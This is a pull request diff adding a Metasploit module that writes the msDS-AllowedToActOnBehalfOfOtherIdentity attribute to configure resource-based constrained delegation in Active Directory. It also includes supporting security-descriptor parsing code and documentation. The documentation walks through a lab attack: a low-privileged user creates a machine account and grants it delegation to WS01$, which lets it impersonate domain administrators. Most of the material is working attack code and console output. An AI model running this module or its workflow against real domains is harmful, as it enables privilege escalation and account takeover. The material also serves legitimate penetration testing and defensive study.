### PR TITLE
Add module for Role Based Constrained Delegation (RBCD)

### DIFF
--- a/documentation/modules/auxiliary/admin/ldap/rbcd.md
+++ b/documentation/modules/auxiliary/admin/ldap/rbcd.md
@@ -1,0 +1,125 @@
+## Vulnerable Application
+
+This module can read and write the necessary LDAP attributes to configure a particular object for Role Based Constrained
+Delegation (RBCD). When writing, the module will add an access control entry to allow the account specified in
+DELEGATE_FROM to the object specified in DELEGATE_TO. In order for this to succeed, the authenticated user must have
+write access to the target object (the object specified in DELEGATE_TO).
+
+## Verification Steps
+
+1. Set the `RHOST` value to a target domain controller
+2. Set the `BIND_DN` and `BIND_PW` information to an account with the necessary privileges
+3. Set the `DELEGATE_TO` and `DELEGATE_FROM` data store options
+4. Use the `WRITE` action to configure the target for RBCD
+
+## Actions
+
+### FLUSH
+Delete the security descriptor. Unlike the REMOVE action, this deletes the entire security descriptor instead of just
+the matching ACEs.
+
+### READ
+Read the security descriptor and print the ACL contents to identify objects that are currently configured for RBCD.
+
+### REMOVE
+Remove matching ACEs from the security descriptor DACL. Unlike the FLUSH action, this only removes the matching ACEs
+instead of deleting the entire security descriptor.
+
+### WRITE
+Add an ACE to the security descriptor DACL to enable RBCD. The new entry will be appended to the ACL after any existing
+ACEs. No changes are made to the security descriptor if the ACE to enable RBCD already exists.
+
+## Options
+
+### DELEGATE_TO
+The delegation target. This is the object whose ACL is the target of the ACTION (read, write, etc.). The authenticated
+user must have write access to this object.
+
+### DELEGATE_FROM
+The delegation source. This is the object which is added to (if action is WRITE) or removed from (if action is REMOVE)
+the delegation target.
+
+## Scenarios
+
+### Window Server 2019 Domain Controller
+In the following example the user `MSFLAB\sandy` has write access to the computer account `WS01$`. The sandy account is
+used to add a new computer account to the domain, then configures WS01$ for delegation from the new computer account.
+
+The new computer account can then impersonate any user, including domain administrators, on `WS01$` by authenticating
+with the Service for User (S4U) Kerberos extension.
+
+```
+msf6 auxiliary(admin/dcerpc/samr_computer) > show options 
+
+Module options (auxiliary/admin/dcerpc/samr_computer):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   COMPUTER_NAME                       no        The computer name
+   COMPUTER_PASSWORD                   no        The password for the new computer
+   RHOSTS                              yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT              445              yes       The target port (TCP)
+   SMBDomain          .                no        The Windows domain to use for authentication
+   SMBPass                             no        The password for the specified username
+   SMBUser                             no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   ADD_COMPUTER  Add a computer account
+
+
+msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser sandy
+SMBUser => sandy
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1!
+SMBPass => Password1!
+msf6 auxiliary(admin/dcerpc/samr_computer) > run
+[*] Running module against 192.168.159.10
+
+[*] 192.168.159.10:445 - Using automatically identified domain: MSFLAB
+[+] 192.168.159.10:445 - Successfully created MSFLAB\DESKTOP-QLSTR9NW$
+[+] 192.168.159.10:445 -   Password: A2HPEkkQzdxQirylqIj7BxqwB7kuUMrT
+[+] 192.168.159.10:445 -   SID:      S-1-5-21-3402587289-1488798532-3618296993-1655
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/samr_computer) > use auxiliary/admin/ldap/rbcd 
+msf6 auxiliary(admin/ldap/rbcd) > set BIND_DN sandy@msflab.local
+BIND_DN => sandy@msflab.local
+msf6 auxiliary(admin/ldap/rbcd) > set BIND_PW Password1!
+BIND_PW => Password1!
+msf6 auxiliary(admin/ldap/rbcd) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/ldap/rbcd) > set DELEGATE_TO WS01$
+DELEGATE_TO => WS01$
+msf6 auxiliary(admin/ldap/rbcd) > read
+[*] Running module against 192.168.159.10
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
+[*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/ldap/rbcd) > set DELEGATE_FROM DESKTOP-QLSTR9NW$
+DELEGATE_FROM => DESKTOP-QLSTR9NW$
+msf6 auxiliary(admin/ldap/rbcd) > write
+[*] Running module against 192.168.159.10
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
+[+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/ldap/rbcd) > read
+[*] Running module against 192.168.159.10
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
+[*] Allowed accounts:
+[*]   DESKTOP-QLSTR9NW$ (S-1-5-21-3402587289-1488798532-3618296993-1655)
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/ldap/rbcd) > 
+```

--- a/lib/msf/core/exploit/remote/ldap.rb
+++ b/lib/msf/core/exploit/remote/ldap.rb
@@ -135,5 +135,29 @@ module Msf
       print_good("#{peer} Discovered base DN: #{base_dn}")
       base_dn
     end
+
+    def validate_bind_success!(ldap)
+      bind_result = ldap.as_json['result']['ldap_result']
+
+      # Codes taken from https://ldap.com/ldap-result-code-reference-core-ldapv3-result-codes
+      case bind_result['resultCode']
+      when 0
+        print_good('Successfully bound to the LDAP server!')
+      when 1
+        fail_with(Msf::Exploit::Remote::Failure::NoAccess, "An operational error occurred, perhaps due to lack of authorization. The error was: #{bind_result['errorMessage'].strip}")
+      when 7
+        fail_with(Msf::Exploit::Remote::Failure::NoTarget, 'Target does not support the simple authentication mechanism!')
+      when 8
+        fail_with(Msf::Exploit::Remote::Failure::NoTarget, "Server requires a stronger form of authentication than we can provide! The error was: #{bind_result['errorMessage'].strip}")
+      when 14
+        fail_with(Msf::Exploit::Remote::Failure::NoTarget, "Server requires additional information to complete the bind. Error was: #{bind_result['errorMessage'].strip}")
+      when 48
+        fail_with(Msf::Exploit::Remote::Failure::NoAccess, "Target doesn't support the requested authentication type we sent. Try binding to the same user without a password, or providing credentials if you were doing anonymous authentication.")
+      when 49
+        fail_with(Msf::Exploit::Remote::Failure::NoAccess, 'Invalid credentials provided!')
+      else
+        fail_with(Msf::Exploit::Remote::Failure::Unknown, "Unknown error occurred whilst binding: #{bind_result['errorMessage'].strip}")
+      end
+    end
   end
 end

--- a/lib/rex/proto/ms_dtyp.rb
+++ b/lib/rex/proto/ms_dtyp.rb
@@ -4,11 +4,12 @@ module Rex::Proto::MsDtyp
   # [2.4.3 ACCESS_MASK](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/7a53f60e-e730-4dfe-bbe9-b21b62eb790b)
   class MsDtypAccessMask < BinData::Record
     endian :little
-    hide   :reserved0, :reserved1, :reserved2
+    hide   :reserved0, :reserved1
 
-    bit16 :reserved0
+    # the protocol field id reserved for protocol-specific access rights
+    bit16 :protocol
 
-    bit3  :reserved1
+    bit3  :reserved0
     bit1  :sy
     bit1  :wo
     bit1  :wd
@@ -19,12 +20,12 @@ module Rex::Proto::MsDtyp
     bit1  :gw
     bit1  :gx
     bit1  :ga
-    bit2  :reserved2
+    bit2  :reserved1
     bit1  :ma
     bit1  :as
 
-    ALL  = MsDtypAccessMask.new({ gr: 1, gw: 1, gx: 1, ga: 1, ma: 1, as: 1, sy: 1, wo: 1, wd: 1, rc: 1, de: 1 })
-    NONE = MsDtypAccessMask.new({ gr: 0, gw: 0, gx: 0, ga: 0, ma: 0, as: 0, sy: 0, wo: 0, wd: 0, rc: 0, de: 0 })
+    ALL  = MsDtypAccessMask.new({ gr: 1, gw: 1, gx: 1, ga: 1, ma: 1, as: 1, sy: 1, wo: 1, wd: 1, rc: 1, de: 1, protocol: 0xffff })
+    NONE = MsDtypAccessMask.new({ gr: 0, gw: 0, gx: 0, ga: 0, ma: 0, as: 0, sy: 0, wo: 0, wd: 0, rc: 0, de: 0, protocol: 0 })
   end
 
   # [2.4.2.2 SID--Packet Representation](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/f992ad60-0fe4-4b87-9fed-beb478836861)
@@ -58,7 +59,7 @@ module Rex::Proto::MsDtyp
 
   # [Universal Unique Identifier](http://pubs.opengroup.org/onlinepubs/9629399/apdxa.htm)
   # The online documentation at [2.3.4.2](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/001eec5a-7f8b-4293-9e21-ca349392db40)
-  # wierdly doesn't mention this needs to be 4 byte aligned for us to read it correctly,
+  # weirdly doesn't mention this needs to be 4 byte aligned for us to read it correctly,
   # which the RubySMB::Dcerpc::Uuid definition takes care of.
   class MsDtypGuid < RubySMB::Dcerpc::Uuid
   end

--- a/lib/rex/proto/ms_dtyp.rb
+++ b/lib/rex/proto/ms_dtyp.rb
@@ -1,30 +1,58 @@
 # -*- coding: binary -*-
 
 module Rex::Proto::MsDtyp
+  # [2.4.3 ACCESS_MASK](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/7a53f60e-e730-4dfe-bbe9-b21b62eb790b)
+  class MsDtypAccessMask < BinData::Record
+    endian :little
+    hide   :reserved0, :reserved1, :reserved2
+
+    bit16 :reserved0
+
+    bit3  :reserved1
+    bit1  :sy
+    bit1  :wo
+    bit1  :wd
+    bit1  :rc
+    bit1  :de
+
+    bit1  :gr
+    bit1  :gw
+    bit1  :gx
+    bit1  :ga
+    bit2  :reserved2
+    bit1  :ma
+    bit1  :as
+
+    ALL  = MsDtypAccessMask.new({ gr: 1, gw: 1, gx: 1, ga: 1, ma: 1, as: 1, sy: 1, wo: 1, wd: 1, rc: 1, de: 1 })
+    NONE = MsDtypAccessMask.new({ gr: 0, gw: 0, gx: 0, ga: 0, ma: 0, as: 0, sy: 0, wo: 0, wd: 0, rc: 0, de: 0 })
+  end
+
   # [2.4.2.2 SID--Packet Representation](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/f992ad60-0fe4-4b87-9fed-beb478836861)
-  class MsDtypSid < BinData::Record
+  class MsDtypSid < BinData::Primitive
     endian :little
 
     uint8 :revision, initial_value: 1
-    uint8 :sub_authority_count, initial_value: -> { sub_authority.length }
+    uint8 :sub_authority_count, initial_value: -> { self.sub_authority.length }
     array :identifier_authority, type: :uint8, initial_length: 6
     array :sub_authority, type: :uint32, initial_length: :sub_authority_count
-    def assign(val)
-      # allow assignment from the human-readable string representation
-      if val.is_a?(String) && val =~ /^S-1-(\d+)(-\d+)+$/
-        _, _, ia, sa = val.split('-', 4)
-        val = {}
-        val[:identifier_authority] = [ia.to_i].pack('Q>')[2..].bytes
-        val[:sub_authority] = sa.split('-').map(&:to_i)
-      end
 
-      super
+    def set(val)
+      # allow assignment from the human-readable string representation
+      raise ArgumentError.new("Invalid SID: #{val}") unless val.is_a?(String) && val =~ /^S-1-(\d+)(-\d+)+$/
+
+      _, _, ia, sa = val.split('-', 4)
+      self.identifier_authority = [ia.to_i].pack('Q>')[2..].bytes
+      self.sub_authority = sa.split('-').map(&:to_i)
     end
 
-    def to_s
+    def get
       str = 'S-1'
       str << "-#{("\x00\x00" + identifier_authority.to_binary_s).unpack1('Q>')}"
       str << '-' + sub_authority.map(&:to_s).join('-')
+    end
+
+    def rid
+      sub_authority.last
     end
   end
 
@@ -33,5 +61,174 @@ module Rex::Proto::MsDtyp
   # wierdly doesn't mention this needs to be 4 byte aligned for us to read it correctly,
   # which the RubySMB::Dcerpc::Uuid definition takes care of.
   class MsDtypGuid < RubySMB::Dcerpc::Uuid
+  end
+
+  # [2.4.4.1 ACE_HEADER](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/628ebb1d-c509-4ea0-a10f-77ef97ca4586)
+  class MsDtypAceHeader < BinData::Record
+    endian :little
+
+    uint8  :ace_type
+    struct :ace_flags do
+      bit1 :failed_access_ace_flag
+      bit1 :successful_access_ace_flag
+      bit1 :reserved
+      bit1 :inherited_ace
+      bit1 :inherit_only_ace
+      bit1 :no_propagate_inherit_ace
+      bit1 :container_inherit_ace
+      bit1 :object_inherit_ace
+    end
+    uint16 :ace_size, initial_value: -> { parent&.num_bytes || 0 }
+  end
+
+  # [2.4.4.2 ACCESS_ALLOWED_ACE](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/72e7c7ea-bc02-4c74-a619-818a16bf6adb)
+  class MsDtypAccessAllowedAceBody < BinData::Record
+    endian :little
+
+    ms_dtyp_access_mask :access_mask
+    ms_dtyp_sid         :sid
+  end
+
+  # [2.4.4.2 ACCESS_ALLOWED_ACE](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/72e7c7ea-bc02-4c74-a619-818a16bf6adb)
+  class MsDtypAccessAllowedAce < BinData::Record
+    endian :little
+
+    ms_dtyp_ace_header              :header, initial_value: { ace_type: 0 }
+    ms_dtyp_access_allowed_ace_body :body
+  end
+
+  class MsDtypAce < BinData::Record
+    endian :little
+
+    ms_dtyp_ace_header :header
+    choice             :body, selection: -> { header.ace_type } do
+      ms_dtyp_access_allowed_ace_body 0
+      string                          :default, read_length: -> { header.ace_size - body.rel_offset }
+    end
+  end
+
+  # [2.4.5 ACL](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/20233ed8-a6c6-4097-aafa-dd545ed24428)
+  class MsDtypAcl < BinData::Record
+    ACL_REVISION = 2
+    ACL_REVISION_DS = 4
+
+    endian :little
+
+    uint8  :acl_revision, initial_value: ACL_REVISION
+    uint8  :sbz1
+    uint16 :acl_size, initial_value: -> { num_bytes }
+    uint16 :acl_count, initial_value: -> { aces.length }
+    uint16 :sbz2
+    array  :aces, type: :ms_dtyp_ace, initial_length: :acl_count
+  end
+
+  # [2.4.6 SECURITY_DESCRIPTOR](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/7d4dac05-9cef-4563-a058-f108abecce1d)
+  class MsDtypSecurityDescriptor < BinData::Record
+    endian :little
+
+    uint8  :revision, initial_value: 1
+    uint8  :sbz1
+    struct :control do
+      bit1 :ss
+      bit1 :dt
+      bit1 :sd
+      bit1 :sp, initial_value: -> { sacl? ? 1 : 0 }
+      bit1 :dd
+      bit1 :dp, initial_value: -> { dacl? ? 1 : 0 }
+      bit1 :gd
+      bit1 :od
+
+      bit1 :sr, initial_value: 1
+      bit1 :rm
+      bit1 :ps
+      bit1 :pd
+      bit1 :si
+      bit1 :di
+      bit1 :sc
+      bit1 :dc
+    end
+    uint32 :offset_owner, value: -> { offset_for(:owner_sid) }
+    uint32 :offset_group, value: -> { offset_for(:group_sid) }
+    uint32 :offset_sacl, value: -> { offset_for(:sacl) }
+    uint32 :offset_dacl, value: -> { offset_for(:dacl) }
+    rest   :buffer, value: -> { build_buffer }
+    hide   :buffer
+
+    def initialize_shared_instance
+      # define accessor methods for the custom fields to expose the same API as BinData
+      define_field_accessors_for2(:owner_sid)
+      define_field_accessors_for2(:group_sid)
+      define_field_accessors_for2(:sacl)
+      define_field_accessors_for2(:dacl)
+      super
+    end
+
+    def initialize_instance
+      value = super
+      @owner_sid = get_parameter(:owner_sid)
+      @group_sid = get_parameter(:group_sid)
+      @sacl = get_parameter(:sacl)
+      @dacl = get_parameter(:dacl)
+      value
+    end
+
+    def do_read(val)
+      value = super
+      if offset_owner != 0
+        @owner_sid = MsDtypSid.read(buffer[offset_owner - buffer.rel_offset..])
+      end
+      if offset_group != 0
+        @group_sid = MsDtypSid.read(buffer[offset_group - buffer.rel_offset..])
+      end
+      if offset_sacl != 0
+        @sacl = MsDtypAcl.read(buffer[offset_sacl - buffer.rel_offset..])
+      end
+      if offset_dacl != 0
+        @dacl = MsDtypAcl.read(buffer[offset_dacl - buffer.rel_offset..])
+      end
+      value
+    end
+
+    def snapshot
+      snap = super
+      snap[:owner_sid] ||= owner_sid&.snapshot
+      snap[:group_sid] ||= group_sid&.snapshot
+      snap[:sacl] ||= sacl&.snapshot
+      snap[:dacl] ||= dacl&.snapshot
+      snap
+    end
+
+    attr_accessor :owner_sid, :group_sid, :sacl, :dacl
+
+    private
+
+    def build_buffer
+      buf = ''
+      buf << owner_sid.to_binary_s if owner_sid
+      buf << group_sid.to_binary_s if group_sid
+      buf << sacl.to_binary_s if sacl
+      buf << dacl.to_binary_s if dacl
+      buf
+    end
+
+    def define_field_accessors_for2(name)
+      define_singleton_method("#{name}?") do
+        !send(name).nil?
+      end
+    end
+
+    def offset_for(field)
+      return 0 unless instance_variable_get("@#{field}")
+
+      offset = buffer.rel_offset
+      %i[ owner_sid group_sid sacl dacl ].each do |cursor|
+        break if cursor == field
+
+        cursor = instance_variable_get("@#{cursor}")
+        offset += cursor.num_bytes if cursor
+      end
+
+      offset
+    end
   end
 end

--- a/modules/auxiliary/admin/ldap/rbcd.rb
+++ b/modules/auxiliary/admin/ldap/rbcd.rb
@@ -1,0 +1,242 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::LDAP
+
+  ATTRIBUTE = 'msDS-AllowedToActOnBehalfOfOtherIdentity'.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Role Base Constrained Delegation',
+        'Description' => %q{
+        },
+        'Author' => [
+          'Podalirius', # Remi Gascou (@podalirius_), Impacket reference implementation
+          'Charlie Bromberg', # Charlie Bromberg (@_nwodtuhs), Impacket reference implementation
+          'Spencer McIntyre' # module author
+        ],
+        'References' => [
+          ['URL', 'https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution'],
+          ['URL', 'https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd'],
+          ['URL', 'https://github.com/SecureAuthCorp/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/rbcd.py']
+        ],
+        'License' => MSF_LICENSE,
+        'Actions' => [
+          ['READ', { 'Description' => 'Read the security descriptor' }],
+          ['REMOVE', { 'Description' => 'Remove matching ACEs from the security descriptor DACL' }],
+          ['FLUSH', { 'Description' => 'Delete the security descriptor' }],
+          ['WRITE', { 'Description' => 'Add an ACE to the security descriptor DACL' }]
+        ],
+        'DefaultAction' => 'READ',
+        'Notes' => {
+          'Stability' => [],
+          'SideEffects' => [CONFIG_CHANGES], # REMOVE, FLUSH, WRITE all make changes
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('DELEGATE_TO', [ true, 'The delegation target' ]),
+      OptString.new('DELEGATE_FROM', [ false, 'The delegation source' ])
+    ])
+  end
+
+  def build_ace(sid)
+    Rex::Proto::MsDtyp::MsDtypAccessAllowedAce.new({
+      body: {
+        access_mask: Rex::Proto::MsDtyp::MsDtypAccessMask::ALL,
+        sid: sid
+      }
+    })
+  end
+
+  def get_delegate_from_obj
+    delegate_from = datastore['DELEGATE_FROM']
+    if delegate_from.blank?
+      fail_with(Failure::BadConfig, 'The DELEGATE_FROM option must be specified for this action.')
+    end
+
+    delegate_from = ldap_get("(sAMAccountName=#{datastore['DELEGATE_FROM']})", attributes: ['sAMAccountName', 'ObjectSID'])
+    fail_with(Failure::NotFound, "Failed to find: #{datastore['DELEGATE_FROM']}") unless delegate_from
+
+    delegate_from
+  end
+
+  def ldap_get(filter, attributes: [])
+    raw_obj = @ldap.search(base: @base_dn, filter: filter, attributes: attributes).first
+    return nil unless raw_obj
+
+    obj = {}
+
+    obj['dn'] = raw_obj['dn'].first.to_s
+    unless raw_obj['sAMAccountName'].empty?
+      obj['sAMAccountName'] = raw_obj['sAMAccountName'].first.to_s
+    end
+
+    unless raw_obj['ObjectSid'].empty?
+      obj['ObjectSid'] = Rex::Proto::MsDtyp::MsDtypSid.read(raw_obj['ObjectSid'].first)
+    end
+
+    unless raw_obj['msDS-AllowedToActOnBehalfOfOtherIdentity'].empty?
+      obj['msDS-AllowedToActOnBehalfOfOtherIdentity'] = Rex::Proto::MsDtyp::MsDtypSecurityDescriptor.read(raw_obj['msDS-AllowedToActOnBehalfOfOtherIdentity'].first)
+    end
+
+    obj
+  end
+
+  def run
+    ldap_connect do |ldap|
+      bind_result = ldap.as_json['result']['ldap_result']
+
+      # Codes taken from https://ldap.com/ldap-result-code-reference-core-ldapv3-result-codes
+      case bind_result['resultCode']
+      when 0
+        print_good('Successfully bound to the LDAP server!')
+      when 1
+        fail_with(Failure::NoAccess, "An operational error occurred, perhaps due to lack of authorization. The error was: #{bind_result['errorMessage']}")
+      when 7
+        fail_with(Failure::NoTarget, 'Target does not support the simple authentication mechanism!')
+      when 8
+        fail_with(Failure::NoTarget, "Server requires a stronger form of authentication than we can provide! The error was: #{bind_result['errorMessage']}")
+      when 14
+        fail_with(Failure::NoTarget, "Server requires additional information to complete the bind. Error was: #{bind_result['errorMessage']}")
+      when 48
+        fail_with(Failure::NoAccess, "Target doesn't support the requested authentication type we sent. Try binding to the same user without a password, or providing credentials if you were doing anonymous authentication.")
+      when 49
+        fail_with(Failure::NoAccess, 'Invalid credentials provided!')
+      else
+        fail_with(Failure::Unknown, "Unknown error occurred whilst binding: #{bind_result['errorMessage']}")
+      end
+      if (@base_dn = datastore['BASE_DN'])
+        print_status("User-specified base DN: #{@base_dn}")
+      else
+        print_status('Discovering base DN automatically')
+
+        unless (@base_dn = discover_base_dn(ldap))
+          print_warning("Couldn't discover base DN!")
+        end
+      end
+      @ldap = ldap
+
+      obj = ldap_get("(sAMAccountName=#{datastore['DELEGATE_TO']})", attributes: ['sAMAccountName', 'ObjectSID', 'msDS-AllowedToActOnBehalfOfOtherIdentity'])
+      fail_with(Failure::NotFound, "Failed to find: #{datastore['DELEGATE_TO']}") unless obj
+
+      send("action_#{action.name.downcase}", obj)
+    end
+  rescue Net::LDAP::Error => e
+    print_error("#{e.class}: #{e.message}")
+  end
+
+  def action_read(obj)
+    security_descriptor = obj[ATTRIBUTE]
+    if security_descriptor.nil?
+      print_status('The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.')
+      return
+    end
+
+    if security_descriptor.dacl.nil?
+      print_status('The msDS-AllowedToActOnBehalfOfOtherIdentity DACL field is empty.')
+      return
+    end
+
+    print_status('Allowed accounts:')
+    security_descriptor.dacl.aces.each do |ace|
+      account_name = ldap_get("(ObjectSid=#{ace.body.sid})", attributes: ['sAMAccountName'])
+      print_status("  #{account_name['sAMAccountName']} (#{ace.body.sid})")
+    end
+  end
+
+  def action_remove(obj)
+    delegate_from = get_delegate_from_obj
+
+    security_descriptor = obj[ATTRIBUTE]
+    unless security_descriptor.dacl && !security_descriptor.dacl.aces.empty?
+      print_status('No DACL ACEs are present, no changes are necessary.')
+      return
+    end
+
+    aces = security_descriptor.dacl.aces.snapshot
+    aces.delete_if { |ace| ace.body[:sid] == delegate_from['ObjectSid'] }
+    delta = security_descriptor.dacl.aces.length - aces.length
+    if delta == 0
+      print_status('No DACL ACEs matched, no changes are necessary.')
+      return
+    else
+      print_status("Removed #{delta} matching ACE#{delta > 1 ? 's' : ''}.")
+    end
+    security_descriptor.dacl.aces = aces
+    # clear these fields so they'll be calculated automatically after the update
+    security_descriptor.dacl.acl_count.clear
+    security_descriptor.dacl.acl_size.clear
+
+    unless @ldap.replace_attribute(obj['dn'], 'msDS-AllowedToActOnBehalfOfOtherIdentity', security_descriptor.to_binary_s)
+      print_error('Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
+      return
+    end
+    print_good('Successfully updated the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
+  end
+
+  def action_flush(obj)
+    unless @ldap.delete_attribute(obj['dn'], 'msDS-AllowedToActOnBehalfOfOtherIdentity')
+      print_error('Failed to deleted the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
+      return
+    end
+
+    print_good('Successfully deleted the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
+  end
+
+  def action_write(obj)
+    delegate_from = get_delegate_from_obj
+    if obj['msDS-AllowedToActOnBehalfOfOtherIdentity']
+      _action_write_update(obj, delegate_from)
+    else
+      _action_write_create(obj, delegate_from)
+    end
+  end
+
+  def _action_write_create(obj, delegate_from)
+    security_descriptor = Rex::Proto::MsDtyp::MsDtypSecurityDescriptor.new
+    security_descriptor.owner_sid = Rex::Proto::MsDtyp::MsDtypSid.new('S-1-5-32-544')
+    security_descriptor.dacl = Rex::Proto::MsDtyp::MsDtypAcl.new
+    security_descriptor.dacl.acl_revision = Rex::Proto::MsDtyp::MsDtypAcl::ACL_REVISION_DS
+    security_descriptor.dacl.aces << build_ace(delegate_from['ObjectSid'])
+
+    unless @ldap.add_attribute(obj['dn'], 'msDS-AllowedToActOnBehalfOfOtherIdentity', security_descriptor.to_binary_s)
+      print_error('Failed to create the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
+      return
+    end
+    print_good('Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
+  end
+
+  def _action_write_update(obj, delegate_from)
+    security_descriptor = obj[ATTRIBUTE]
+    if security_descriptor.dacl
+      if security_descriptor.dacl.aces.any? { |ace| ace.body[:sid].to_s == delegate_from['ObjectSid'].to_s }
+        print_status("Delegation from #{datastore['DELEGATE_FROM']} to #{datastore['DELEGATE_TO']} is already enabled.")
+        return true
+      end
+      # clear these fields so they'll be calculated automatically after the update
+      security_descriptor.dacl.acl_count.clear
+      security_descriptor.dacl.acl_size.clear
+    else
+      security_descriptor.control.dp = 1
+      security_descriptor.dacl = Rex::Proto::MsDtyp::MsDtypAcl.new
+      security_descriptor.dacl.acl_revision = Rex::Proto::MsDtyp::MsDtypAcl::ACL_REVISION_DS
+    end
+
+    security_descriptor.dacl.aces << build_ace(delegate_from['ObjectSid'])
+
+    unless @ldap.replace_attribute(obj['dn'], 'msDS-AllowedToActOnBehalfOfOtherIdentity', security_descriptor.to_binary_s)
+      print_error('Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
+      return
+    end
+    print_good('Successfully updated the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
+  end
+end

--- a/modules/auxiliary/admin/ldap/rbcd.rb
+++ b/modules/auxiliary/admin/ldap/rbcd.rb
@@ -169,7 +169,11 @@ class MetasploitModule < Msf::Auxiliary
     print_status('Allowed accounts:')
     security_descriptor.dacl.aces.each do |ace|
       account_name = ldap_get("(ObjectSid=#{ace.body.sid})", attributes: ['sAMAccountName'])
-      print_status("  #{account_name['sAMAccountName']} (#{ace.body.sid})")
+      if account_name
+        print_status("  #{ace.body.sid} (#{account_name['sAMAccountName']})")
+      else
+        print_status("  #{ace.body.sid}")
+      end
     end
   end
 

--- a/modules/auxiliary/admin/ldap/rbcd.rb
+++ b/modules/auxiliary/admin/ldap/rbcd.rb
@@ -238,7 +238,10 @@ class MetasploitModule < Msf::Auxiliary
     unless @ldap.add_attribute(obj['dn'], ATTRIBUTE, security_descriptor.to_binary_s)
       fail_with_ldap_error('Failed to create the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
     end
+
     print_good('Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
+    print_status('Added account:')
+    print_status("  #{delegate_from['ObjectSid']} (#{delegate_from['sAMAccountName']})")
   end
 
   def _action_write_update(obj, delegate_from)
@@ -246,7 +249,6 @@ class MetasploitModule < Msf::Auxiliary
     if security_descriptor.dacl
       if security_descriptor.dacl.aces.any? { |ace| ace.body[:sid].to_s == delegate_from['ObjectSid'].to_s }
         print_status("Delegation from #{delegate_from['sAMAccountName']} to #{obj['sAMAccountName']} is already enabled.")
-        return true
       end
       # clear these fields so they'll be calculated automatically after the update
       security_descriptor.dacl.acl_count.clear
@@ -261,8 +263,8 @@ class MetasploitModule < Msf::Auxiliary
 
     unless @ldap.replace_attribute(obj['dn'], ATTRIBUTE, security_descriptor.to_binary_s)
       fail_with_ldap_error('Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
-      return
     end
+
     print_good('Successfully updated the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
   end
 end

--- a/modules/auxiliary/gather/ldap_query.rb
+++ b/modules/auxiliary/gather/ldap_query.rb
@@ -435,27 +435,8 @@ class MetasploitModule < Msf::Auxiliary
     entries = nil
     begin
       ldap_connect do |ldap|
-        bind_result = ldap.as_json['result']['ldap_result']
+        validate_bind_success!(ldap)
 
-        # Codes taken from https://ldap.com/ldap-result-code-reference-core-ldapv3-result-codes
-        case bind_result['resultCode']
-        when 0
-          print_good('Successfully bound to the LDAP server!')
-        when 1
-          fail_with(Failure::NoAccess, "An operational error occurred, perhaps due to lack of authorization. The error was: #{bind_result['errorMessage']}")
-        when 7
-          fail_with(Failure::NoTarget, 'Target does not support the simple authentication mechanism!')
-        when 8
-          fail_with(Failure::NoTarget, "Server requires a stronger form of authentication than we can provide! The error was: #{bind_result['errorMessage']}")
-        when 14
-          fail_with(Failure::NoTarget, "Server requires additional information to complete the bind. Error was: #{bind_result['errorMessage']}")
-        when 48
-          fail_with(Failure::NoAccess, "Target doesn't support the requested authentication type we sent. Try binding to the same user without a password, or providing credentials if you were doing anonymous authentication.")
-        when 49
-          fail_with(Failure::NoAccess, 'Invalid credentials provided!')
-        else
-          fail_with(Failure::Unknown, "Unknown error occurred whilst binding: #{bind_result['errorMessage']}")
-        end
         if (@base_dn = datastore['BASE_DN'])
           print_status("User-specified base DN: #{@base_dn}")
         else
